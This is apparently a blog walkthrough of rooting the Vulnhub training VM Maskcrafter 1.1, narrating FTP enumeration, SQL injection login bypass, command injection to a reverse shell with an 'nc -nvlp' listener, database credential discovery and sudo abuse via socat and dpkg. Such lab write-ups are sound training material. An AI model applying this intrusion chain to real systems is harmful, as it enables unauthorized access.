Let’s do Maskcrafter 1.1, a download from Vulnhub.com. This box is classified by the creator as “Beginner” level. While I agree that it did not take any advanced knowledge to root the box, I would argue that the number of steps it took to get to root, the enumeration it required, and the number of rabbit-holes puts it at a more difficult level than your average Vulnhub “Easy” box. That said, I found this box interesting and worth all the time to work through. What did you think?
Initial Enumeration and Low-Privilege Shell
After getting our VM setup in VMWare player, we start with our nmap scans.
We have a lot to investigate. Any time I see anonymous ftp, I will try that first, hoping to get a quick strike. This box didn’t disappoint.
We get two files from the ftp site, NOTES.txt and cred.zip. The zip file is password protected, but the text file gives us some good info for our web enumeration.
We continue to the webserver. The default page gives us a login screen.
Notes.txt tells us that the site is vulnerable to SQL injection. I used Burp repeater and was able to bypass the login screen with one of the basic SQL Injection tests from OWASP.
However, after bypassing the login, we seem to reach a dead end.
Let’s move on to the /debug directory mentioned in NOTES.txt. If we navigate there in Firefox we come to a site that allows us to run select shell commands.
Hopefully when you see something like this, your first thought will be to capture a request in BurpSuite and see what you can abuse. Here is the captured request.
If we modify the parameter we are passing to “command=” we can execute shell commands. We can perform plenty of enumeration this way, but our goal should always be to get a shell. I tried at least five or six reverse shells from pentestmonkey’s reverse shell cheat sheet before finally finding one that worked for me. Of course, don’t forget to launch your netcat listener with an “nc -nvlp 8001” on your attacker box before sending the command.
Post-Exploit Enumeration
As we so-often do in webapp pentesting, we get a shell as low-privilege user www-data and we begin in the /var/www/html/debug folder. Now I have to confess that instead of enumerating through the local folders I moved straight into home directory enumeration. This was an error that cost me quite a few hours and led me down a number of rabbit-holes. I investigated or attempted, in no particular order:
- Linux kernel exploits
- NFS enumeration
- Cracking the .htpasswd hash with hashcat (smh!)
- Enumerating the phpmyadmin mysql database, which linpeas.sh detects
- Checking SUID files on GTFOBins
- The mysterious /source folder (is that a rabbit hole or can you actually do something with it?)
- Grep’ing through files for passwords in plain text
- Looking through the box creator’s Github site, which is referenced in /source
- More things that I’m forgetting
What I could have done upon getting my initial shell was to look through the /var/www/html folder and I would have found the file db.php that has information on another mysql database. This should also have been obvious to me from my inital investigation of the web server.
MYSQL Enumeration
As previously mentioned, in file /var/www/html/db.php we find mysql database information. Let’s look through the database.
Finally we have the elusive password to the zip file we found via anonymous ftp! The two user accounts are to the (I believe) useless login.php page. Let’s concentrate on the zip file.
Sudo Privileges and Root Shell
Now we have login creds for userx and from now on we can ssh into box instead of working through our reverse shell. I did an “su” to userx and enumerated userx’s home directory, which appeared to be a dead end. However, userx has sudo privileges.
The script whatsmyid.sh doesn’t do much, but we can modify it to be more useful. I used vim to edit the script and execute “/bin/bash” instead of just “id”. Let’s run it again, this time with our sudo privileges.
While it didn’t get us to root, we are now user “evdaez” and we have more sudo privileges. GTFOBins tells us how to abuse sudo privileges for /usr/bin/socat.
We get a shell as researcherx, who also has their own sudo privileges. We improve our shell and once again consult with GTFOBins on how to abuse dpkg sudo privileges.
And we have gotten a root shell! We are told that there is a second way to root. Did you find this one? Drop a comment and let me know. Thanks for reading!
